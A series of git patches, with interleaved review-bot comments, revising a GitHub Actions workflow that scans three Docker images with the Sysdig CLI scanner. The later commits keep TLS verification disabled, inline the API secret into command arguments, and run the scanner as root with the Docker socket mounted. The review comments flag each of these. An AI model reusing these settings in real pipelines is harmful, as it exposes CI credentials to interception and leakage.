18/73] correct Sysdig image scan workflow --- .github/workflows/scan.yml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 78d8834ee8..9a3b30ca2b 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -13,6 +13,7 @@ env: jobs: image-scan: runs-on: ubuntu-latest + steps: - name: Checkout code uses: actions/checkout@v3 
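Review bot: The three scan steps are now identical except for the image name, and patches 18, 19, 22 and 23 go on editing each copy separately, which is how the `--client-token`/`--token` flip-flops keep slipping through. A single step that loops over the images keeps the command in one place; with GitHub's default `-e` shell the loop stops at the first failing scan, the same fail-fast behaviour the separate steps give. The image pin and token quoting from the other review notes apply to the one remaining `docker run` line.
```yaml
      - name: Run Sysdig Scan
        run: |
          for image in voting-app worker result; do
            docker run --rm \
              -v /var/run/docker.sock:/var/run/docker.sock \
              quay.io/sysdig/sysdig-cli-scanner:latest \
              scan "docker://${image}" \
              --apiurl "$SYS_DIG_SECURE_URL" \
              --client-token "$SECURE_API_TOKEN"
          done
```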
@@ -30,7 +31,7 @@ jobs: quay.io/sysdig/sysdig-cli-scanner:latest \ scan docker://voting-app \ --apiurl $SYS_DIG_SECURE_URL \ - --client-token $SECURE_API_TOKEN + --token $SECURE_API_TOKEN - name: Run Sysdig Scan on worker run: | @@ -39,7 +40,7 @@ jobs: quay.io/sysdig/sysdig-cli-scanner:latest \ scan docker://worker \ --apiurl $SYS_DIG_SECURE_URL \ - --client-token $SECURE_API_TOKEN + --token $SECURE_API_TOKEN - name: Run Sysdig Scan on result run: | @@ -48,5 +49,5 @@ jobs: quay.io/sysdig/sysdig-cli-scanner:latest \ scan docker://result \ --apiurl $SYS_DIG_SECURE_URL \ - --client-token $SECURE_API_TOKEN + --token $SECURE_API_TOKEN From 8896a06386a538c1af144dba7b0e7a6c147d0df9 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 02:08:10 +0900 Subject: [PATCH 19/73] correct Sysdig image scan workflow --- .github/workflows/scan.yml | 25 ++++++++++++------------- 1 file changed, 12 insertions(+), 13 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 9a3b30ca2b..2b9d45b590 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -1,9 +1,8 @@ -name: Sysdig Image Scan +name: Sysdig Docker Image Scan on: push: - branches: - - main + branches: [main] workflow_dispatch: env: @@ -15,7 +14,7 @@ jobs: runs-on: ubuntu-latest steps: - - name: Checkout code + - name: Checkout uses: actions/checkout@v3 - name: Build Docker images 
@@ -24,30 +23,30 @@ jobs: docker build -t worker ./worker docker build -t result ./result - - name: Run Sysdig Scan on voting-app + - name: Scan voting-app run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ quay.io/sysdig/sysdig-cli-scanner:latest \ scan docker://voting-app \ - --apiurl $SYS_DIG_SECURE_URL \ - --token $SECURE_API_TOKEN + --apiurl "$SYS_DIG_SECURE_URL" \ + --token "$SECURE_API_TOKEN" - - name: Run Sysdig Scan on worker + - name: Scan worker run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ quay.io/sysdig/sysdig-cli-scanner:latest \ scan docker://worker \ - --apiurl $SYS_DIG_SECURE_URL \ - --token $SECURE_API_TOKEN + --apiurl "$SYS_DIG_SECURE_URL" \ + --token "$SECURE_API_TOKEN" - - name: Run Sysdig Scan on result + - name: Scan result run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ quay.io/sysdig/sysdig-cli-scanner:latest \ scan docker://result \ - --apiurl $SYS_DIG_SECURE_URL \ - --token $SECURE_API_TOKEN + --apiurl "$SYS_DIG_SECURE_URL" \ + --token "$SECURE_API_TOKEN" From b230cc5e7d9a91da9c4b65c059b1d12796569653 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 09:50:06 +0900 Subject: [PATCH 20/73] correct Sysdig image scan workflow --- .github/workflows/scan.yml | 36 ++++++++++++++++-------------------- 1 file changed, 16 insertions(+), 20 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 2b9d45b590..72936770e6 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -6,15 +6,15 @@ on: workflow_dispatch: env: - SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} SYS_DIG_SECURE_URL: https://app.au1.sysdig.com + SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} jobs: - image-scan: + scan: runs-on: ubuntu-latest steps: - - name: Checkout + - name: Checkout source uses: actions/checkout@v3 - name: Build Docker images 
@@ -23,30 +23,26 @@ jobs: docker build -t worker ./worker docker build -t result ./result - - name: Scan voting-app + - name: Run Sysdig CLI Scanner via Docker run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ - quay.io/sysdig/sysdig-cli-scanner:latest \ - scan docker://voting-app \ - --apiurl "$SYS_DIG_SECURE_URL" \ - --token "$SECURE_API_TOKEN" + quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ + --apiurl $SYS_DIG_SECURE_URL \ + --token $SECURE_API_TOKEN \ + docker://voting-app - - name: Scan worker - run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ - quay.io/sysdig/sysdig-cli-scanner:latest \ - scan docker://worker \ - --apiurl "$SYS_DIG_SECURE_URL" \ - --token "$SECURE_API_TOKEN" + quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ + --apiurl $SYS_DIG_SECURE_URL \ + --token $SECURE_API_TOKEN \ + docker://worker - - name: Scan result - run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ - quay.io/sysdig/sysdig-cli-scanner:latest \ - scan docker://result \ - --apiurl "$SYS_DIG_SECURE_URL" \ - --token "$SECURE_API_TOKEN" + quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ + --apiurl $SYS_DIG_SECURE_URL \ + --token $SECURE_API_TOKEN \ + docker://result From d2502e5dff273825b36976df1a997f4223815c5c Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 09:52:04 +0900 Subject: [PATCH 21/73] correct Sysdig image scan workflow --- .github/workflows/scan.yml | 23 +++++++++++++---------- 1 file changed, 13 insertions(+), 10 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 72936770e6..6a37fa7171 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -1,4 +1,4 @@ -name: Sysdig Docker Image Scan +name: Sysdig Image Scan on: push: 
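Review bot: The double quotes around `"$SYS_DIG_SECURE_URL"` and `"$SECURE_API_TOKEN"` that patch 19 added are dropped again on all three `docker run` lines, and the `scan` subcommand goes with them, so this hunk reverts two of the previous commit's changes while pinning the image; patch 21 then has to put `scan` back. Whether `1.22.4` needs the subcommand should be settled from that version's `--help` rather than by trial. The pin to `1.22.4` is an improvement; adding the digest (`quay.io/sysdig/sysdig-cli-scanner:1.22.4@sha256:<DIGEST>`) makes it immutable. Keep the quoting: `--apiurl "$SYS_DIG_SECURE_URL" \` and `--token "$SECURE_API_TOKEN" \`.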
@@ -6,8 +6,8 @@ on: workflow_dispatch: env: - SYS_DIG_SECURE_URL: https://app.au1.sysdig.com - SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} + SYSDIG_SECURE_TOKEN: ${{ secrets.SECURE_API_TOKEN }} + SYSDIG_SECURE_URL: https://app.au1.sysdig.com jobs: scan: @@ -23,26 +23,29 @@ jobs: docker build -t worker ./worker docker build -t result ./result - - name: Run Sysdig CLI Scanner via Docker + - name: Run Sysdig Scan via Docker image (scan subcommand) run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ + -e SYSDIG_SECURE_TOKEN=$SYSDIG_SECURE_TOKEN \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - --apiurl $SYS_DIG_SECURE_URL \ - --token $SECURE_API_TOKEN \ + scan \ + --apiurl $SYSDIG_SECURE_URL \ docker://voting-app docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ + -e SYSDIG_SECURE_TOKEN=$SYSDIG_SECURE_TOKEN \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - --apiurl $SYS_DIG_SECURE_URL \ - --token $SECURE_API_TOKEN \ + scan \ + --apiurl $SYSDIG_SECURE_URL \ docker://worker docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ + -e SYSDIG_SECURE_TOKEN=$SYSDIG_SECURE_TOKEN \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - --apiurl $SYS_DIG_SECURE_URL \ - --token $SECURE_API_TOKEN \ + scan \ + --apiurl $SYSDIG_SECURE_URL \ docker://result From 4ee922ea78fe0db5b5fdc9d956635d26a6a4324c Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 09:54:30 +0900 Subject: [PATCH 22/73] correct Sysdig image scan workflow --- .github/workflows/scan.yml | 32 +++++++++++++++----------------- 1 file changed, 15 insertions(+), 17 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 6a37fa7171..3f41f5ada1 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml 
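Review bot: `-e SYSDIG_SECURE_TOKEN=$SYSDIG_SECURE_TOKEN` puts the token value itself into the `docker run` argument list, where it is visible to anything on the runner that can list processes, and unquoted it would also be word-split if it ever contained whitespace. Docker accepts the bare name form `-e SYSDIG_SECURE_TOKEN` to forward the variable from the caller's environment without placing the value in argv; patch 14 already used that form. Patches 22 and 23 go further and inline `${{ secrets.SECURE_API_TOKEN }}` into the same `-e` argument, which combines this with the expression-in-script problem noted on patch 02.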
@@ -2,19 +2,19 @@ name: Sysdig Image Scan on: push: - branches: [main] + branches: + - main workflow_dispatch: env: - SYSDIG_SECURE_TOKEN: ${{ secrets.SECURE_API_TOKEN }} SYSDIG_SECURE_URL: https://app.au1.sysdig.com jobs: - scan: + image-scan: runs-on: ubuntu-latest steps: - - name: Checkout source + - name: Checkout code uses: actions/checkout@v3 - name: Build Docker images @@ -23,29 +23,27 @@ jobs: docker build -t worker ./worker docker build -t result ./result - - name: Run Sysdig Scan via Docker image (scan subcommand) + - name: Run Sysdig Scan on voting-app run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SYSDIG_SECURE_TOKEN=$SYSDIG_SECURE_TOKEN \ + -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - scan \ - --apiurl $SYSDIG_SECURE_URL \ - docker://voting-app + scan --apiurl $SYSDIG_SECURE_URL docker://voting-app + - name: Run Sysdig Scan on worker + run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SYSDIG_SECURE_TOKEN=$SYSDIG_SECURE_TOKEN \ + -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - scan \ - --apiurl $SYSDIG_SECURE_URL \ - docker://worker + scan --apiurl $SYSDIG_SECURE_URL docker://worker + - name: Run Sysdig Scan on result + run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SYSDIG_SECURE_TOKEN=$SYSDIG_SECURE_TOKEN \ + -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - scan \ - --apiurl $SYSDIG_SECURE_URL \ - docker://result + scan --apiurl $SYSDIG_SECURE_URL docker://result From c10289db5343e68e06e219979a98114f60f47d77 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 09:57:16 +0900 Subject: [PATCH 23/73] correct Sysdig image scan workflow --- .github/workflows/scan.yml | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) 
diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 3f41f5ada1..e3d8981d31 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -6,13 +6,13 @@ on: - main workflow_dispatch: -env: - SYSDIG_SECURE_URL: https://app.au1.sysdig.com - jobs: image-scan: runs-on: ubuntu-latest + env: + SYSDIG_SECURE_URL: https://app.au1.sysdig.com + steps: - name: Checkout code uses: actions/checkout@v3 @@ -23,27 +23,27 @@ jobs: docker build -t worker ./worker docker build -t result ./result - - name: Run Sysdig Scan on voting-app + - name: Scan voting-app image with Sysdig CLI run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - scan --apiurl $SYSDIG_SECURE_URL docker://voting-app + scan --apiurl "${SYSDIG_SECURE_URL}" docker://voting-app - - name: Run Sysdig Scan on worker + - name: Scan worker image with Sysdig CLI run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - scan --apiurl $SYSDIG_SECURE_URL docker://worker + scan --apiurl "${SYSDIG_SECURE_URL}" docker://worker - - name: Run Sysdig Scan on result + - name: Scan result image with Sysdig CLI run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - scan --apiurl $SYSDIG_SECURE_URL docker://result + scan --apiurl "${SYSDIG_SECURE_URL}" docker://result From 76e40d5be9ea6ccb1d2e1d4e5fe5e38ada7fab01 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 10:36:44 +0900 Subject: [PATCH 24/73] correct Sysdig image scan workflow --- .github/workflows/scan.yml | 32 ++++++++++++++++++++------------ 1 file changed, 20 insertions(+), 12 deletions(-) 
diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index e3d8981d31..b26439d19f 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -10,40 +10,48 @@ jobs: image-scan: runs-on: ubuntu-latest + # 🧪 環境変数の注入(ここが非常に重要) env: - SYSDIG_SECURE_URL: https://app.au1.sysdig.com + SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} + SYS_DIG_SECURE_URL: https://app.au1.sysdig.com steps: - - name: Checkout code + - name: 🛎️ Checkout code uses: actions/checkout@v3 - - name: Build Docker images + - name: 🏗️ Build Docker images run: | docker build -t voting-app ./vote docker build -t worker ./worker docker build -t result ./result - - name: Scan voting-app image with Sysdig CLI + - name: 🔍 Run Sysdig Scan (voting-app) run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - scan --apiurl "${SYSDIG_SECURE_URL}" docker://voting-app + scan \ + --apiurl $SYS_DIG_SECURE_URL \ + --token $SECURE_API_TOKEN \ + docker://voting-app - - name: Scan worker image with Sysdig CLI + - name: 🔍 Run Sysdig Scan (worker) run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - scan --apiurl "${SYSDIG_SECURE_URL}" docker://worker + scan \ + --apiurl $SYS_DIG_SECURE_URL \ + --token $SECURE_API_TOKEN \ + docker://worker - - name: Scan result image with Sysdig CLI + - name: 🔍 Run Sysdig Scan (result) run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - scan --apiurl "${SYSDIG_SECURE_URL}" docker://result + scan \ + --apiurl $SYS_DIG_SECURE_URL \ + --token $SECURE_API_TOKEN \ + docker://result From 6348a8db5b50f5cf0b3b77c253a8972b38c86fa0 Mon Sep 17 00:00:00 2001 
From: keitahigaki Date: Wed, 16 Jul 2025 10:40:52 +0900 Subject: [PATCH 25/73] final Sysdig image scan workflow --- .github/workflows/scan.yml | 26 +++++++++++++------------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index b26439d19f..e2559251ed 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -10,7 +10,7 @@ jobs: image-scan: runs-on: ubuntu-latest - # 🧪 環境変数の注入(ここが非常に重要) + # 🧪 環境変数の注入(Secretsから取得) env: SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} SYS_DIG_SECURE_URL: https://app.au1.sysdig.com @@ -30,28 +30,28 @@ jobs: docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - scan \ - --apiurl $SYS_DIG_SECURE_URL \ - --token $SECURE_API_TOKEN \ - docker://voting-app + scan \ + --apiurl $SYS_DIG_SECURE_URL \ + --token $SECURE_API_TOKEN \ + docker://voting-app - name: 🔍 Run Sysdig Scan (worker) run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - scan \ - --apiurl $SYS_DIG_SECURE_URL \ - --token $SECURE_API_TOKEN \ - docker://worker + scan \ + --apiurl $SYS_DIG_SECURE_URL \ + --token $SECURE_API_TOKEN \ + docker://worker - name: 🔍 Run Sysdig Scan (result) run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - scan \ - --apiurl $SYS_DIG_SECURE_URL \ - --token $SECURE_API_TOKEN \ - docker://result + scan \ + --apiurl $SYS_DIG_SECURE_URL \ + --token $SECURE_API_TOKEN \ + docker://result From 72af093d353bf584983995826c087c205bc1b37a Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 12:13:46 +0900 Subject: [PATCH 26/73] final Sysdig image scan --- .github/workflows/scan.yml | 47 +++++++++++++++++++++++--------------- 1 file changed, 29 insertions(+), 18 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index e2559251ed..f5ce48b24b 100644 
--- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -1,16 +1,15 @@ name: Sysdig Image Scan on: + workflow_dispatch: push: branches: - main - workflow_dispatch: jobs: image-scan: runs-on: ubuntu-latest - # 🧪 環境変数の注入(Secretsから取得) env: SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} SYS_DIG_SECURE_URL: https://app.au1.sysdig.com 
@@ -19,39 +18,51 @@ jobs: - name: 🛎️ Checkout code uses: actions/checkout@v3 - - name: 🏗️ Build Docker images + - name: 🧱 Build Docker images run: | docker build -t voting-app ./vote docker build -t worker ./worker docker build -t result ./result - - name: 🔍 Run Sysdig Scan (voting-app) + - name: 🔍 Scan voting-app with Sysdig run: | docker run --rm \ + --platform linux/amd64 \ + --user 0 \ + -v "${{ github.workspace }}/scan-logs:/home/nonroot/scan-logs" \ -v /var/run/docker.sock:/var/run/docker.sock \ + -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - scan \ - --apiurl $SYS_DIG_SECURE_URL \ - --token $SECURE_API_TOKEN \ - docker://voting-app + --apiurl $SYS_DIG_SECURE_URL \ + --loglevel debug \ + --skiptlsverify \ + docker://voting-app - - name: 🔍 Run Sysdig Scan (worker) + - name: 🔍 Scan worker with Sysdig run: | docker run --rm \ + --platform linux/amd64 \ + --user 0 \ + -v "${{ github.workspace }}/scan-logs:/home/nonroot/scan-logs" \ -v /var/run/docker.sock:/var/run/docker.sock \ + -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - scan \ - --apiurl $SYS_DIG_SECURE_URL \ - --token $SECURE_API_TOKEN \ - docker://worker + --apiurl $SYS_DIG_SECURE_URL \ + --loglevel debug \ + --skiptlsverify \ + docker://worker - - name: 🔍 Run Sysdig Scan (result) + - name: 🔍 Scan result with Sysdig run: | docker run --rm \ + --platform linux/amd64 \ + --user 0 \ + -v "${{ github.workspace }}/scan-logs:/home/nonroot/scan-logs" \ -v /var/run/docker.sock:/var/run/docker.sock \ + -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - scan \ - --apiurl $SYS_DIG_SECURE_URL \ - --token $SECURE_API_TOKEN \ - docker://result + --apiurl $SYS_DIG_SECURE_URL \ + --loglevel debug \ + --skiptlsverify \ + docker://result From 49364867c816a952eecc35d8eadff5c62c9b6ab7 Mon Sep 17 00:00:00 2001 
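Review bot: `--skiptlsverify` on all three new scan steps turns off certificate verification for the connection to `https://app.au1.sysdig.com`, so the token in `SECURE_API_TOKEN` is sent to whatever answers for that hostname on the runner's network path; a public SaaS endpoint with a valid certificate should not need this, and if an intercepting proxy is the reason, mount its CA into the container instead of disabling verification. `--loglevel debug` sends the scanner's verbose output, whose contents I cannot judge from the hunk, into a job log readable by anyone who can read the repository; `info` is enough once the scan works. `--user 0` plus the bind-mounted `/var/run/docker.sock` gives the scanner container root on the runner, so if that combination stays, pin the image by digest rather than the `1.22.4` tag. Lastly, `-e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }}` interpolates the secret into the shell script text; prefer a step `env:` and `-e SECURE_API_TOKEN` with no value.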
From: keitahigaki Date: Wed, 16 Jul 2025 12:20:06 +0900 Subject: [PATCH 27/73] final Sysdig image scan --- .github/workflows/scan.yml | 39 +++++++++++++++++++------------------- 1 file changed, 19 insertions(+), 20 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index f5ce48b24b..712cbe41da 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -1,19 +1,15 @@ name: Sysdig Image Scan on: - workflow_dispatch: push: branches: - main + workflow_dispatch: jobs: image-scan: runs-on: ubuntu-latest - env: - SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} - SYS_DIG_SECURE_URL: https://app.au1.sysdig.com - steps: - name: 🛎️ Checkout code uses: actions/checkout@v3 
@@ -24,45 +20,48 @@ jobs: docker build -t worker ./worker docker build -t result ./result - - name: 🔍 Scan voting-app with Sysdig + - name: 🛡️ Scan voting-app with Sysdig + env: + SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} run: | docker run --rm \ --platform linux/amd64 \ --user 0 \ - -v "${{ github.workspace }}/scan-logs:/home/nonroot/scan-logs" \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \ + -e SECURE_API_TOKEN=$SECURE_API_TOKEN \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - --apiurl $SYS_DIG_SECURE_URL \ - --loglevel debug \ + --apiurl https://app.au1.sysdig.com \ + --loglevel info \ --skiptlsverify \ docker://voting-app - - name: 🔍 Scan worker with Sysdig + - name: 🛡️ Scan worker with Sysdig + env: + SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} run: | docker run --rm \ --platform linux/amd64 \ --user 0 \ - -v "${{ github.workspace }}/scan-logs:/home/nonroot/scan-logs" \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \ + -e SECURE_API_TOKEN=$SECURE_API_TOKEN \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - --apiurl $SYS_DIG_SECURE_URL \ - --loglevel debug \ + --apiurl https://app.au1.sysdig.com \ + --loglevel info \ --skiptlsverify \ docker://worker - - name: 🔍 Scan result with Sysdig + - name: 🛡️ Scan result with Sysdig + env: + SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} run: | docker run --rm \ --platform linux/amd64 \ --user 0 \ - -v "${{ github.workspace }}/scan-logs:/home/nonroot/scan-logs" \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \ + -e SECURE_API_TOKEN=$SECURE_API_TOKEN \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - --apiurl $SYS_DIG_SECURE_URL \ - --loglevel debug \ + --apiurl https://app.au1.sysdig.com \ + --loglevel info \ --skiptlsverify \ docker://result From ff0ff1472ad646f5026fb6a30b2f7cb40a1d9bc5 Mon Sep 17 00:00:00 2001 
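Review bot: Moving the secret into a step-level `env:` is the right direction, but `-e SECURE_API_TOKEN=$SECURE_API_TOKEN` then expands it straight back into the `docker run` argv, where it shows up in the runner's process list and in `docker inspect`; `-e SECURE_API_TOKEN \` with no `=value` passes it from the environment without that exposure. `--skiptlsverify` survives this rewrite and still means the token travels over an unverified TLS session to `app.au1.sysdig.com`; with a hard-coded public `https://` URL there is no reason to keep it. The three steps are identical apart from the image name — a `matrix` over `[voting-app, worker, result]` would leave one copy to review.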
From: keitahigaki Date: Wed, 16 Jul 2025 12:22:04 +0900 Subject: [PATCH 28/73] final Sysdig image scan --- .github/workflows/scan.yml | 18 ++++++------------ 1 file changed, 6 insertions(+), 12 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 712cbe41da..9bc5d3a42d 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -20,45 +20,39 @@ jobs: docker build -t worker ./worker docker build -t result ./result - - name: 🛡️ Scan voting-app with Sysdig - env: - SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} + - name: 🔍 Scan with Sysdig (voting-app) run: | docker run --rm \ --platform linux/amd64 \ --user 0 \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SECURE_API_TOKEN=$SECURE_API_TOKEN \ + -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ --apiurl https://app.au1.sysdig.com \ --loglevel info \ --skiptlsverify \ docker://voting-app - - name: 🛡️ Scan worker with Sysdig - env: - SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} + - name: 🔍 Scan with Sysdig (worker) run: | docker run --rm \ --platform linux/amd64 \ --user 0 \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SECURE_API_TOKEN=$SECURE_API_TOKEN \ + -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ --apiurl https://app.au1.sysdig.com \ --loglevel info \ --skiptlsverify \ docker://worker - - name: 🛡️ Scan result with Sysdig - env: - SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} + - name: 🔍 Scan with Sysdig (result) run: | docker run --rm \ --platform linux/amd64 \ --user 0 \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SECURE_API_TOKEN=$SECURE_API_TOKEN \ + -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ --apiurl https://app.au1.sysdig.com \ --loglevel info \ From d68086c94ca6f26381ab3fdeb5bf001c19665d6e Mon Sep 17 00:00:00 2001 
From: keitahigaki Date: Wed, 16 Jul 2025 12:27:37 +0900 Subject: [PATCH 29/73] final Sysdig image scan --- .github/workflows/scan.yml | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 9bc5d3a42d..99768f4c7c 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -11,48 +11,48 @@ jobs: runs-on: ubuntu-latest steps: - - name: 🛎️ Checkout code + - name: Checkout code uses: actions/checkout@v3 - - name: 🧱 Build Docker images + - name: Build Docker images run: | docker build -t voting-app ./vote docker build -t worker ./worker docker build -t result ./result - - name: 🔍 Scan with Sysdig (voting-app) + - name: Run Sysdig Scan (voting-app) run: | docker run --rm \ --platform linux/amd64 \ --user 0 \ + -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ --apiurl https://app.au1.sysdig.com \ --loglevel info \ --skiptlsverify \ docker://voting-app - - name: 🔍 Scan with Sysdig (worker) + - name: Run Sysdig Scan (worker) run: | docker run --rm \ --platform linux/amd64 \ --user 0 \ + -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ --apiurl https://app.au1.sysdig.com \ --loglevel info \ --skiptlsverify \ docker://worker - - name: 🔍 Scan with Sysdig (result) + - name: Run Sysdig Scan (result) run: | docker run --rm \ --platform linux/amd64 \ --user 0 \ + -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ --apiurl https://app.au1.sysdig.com \ --loglevel info \ 
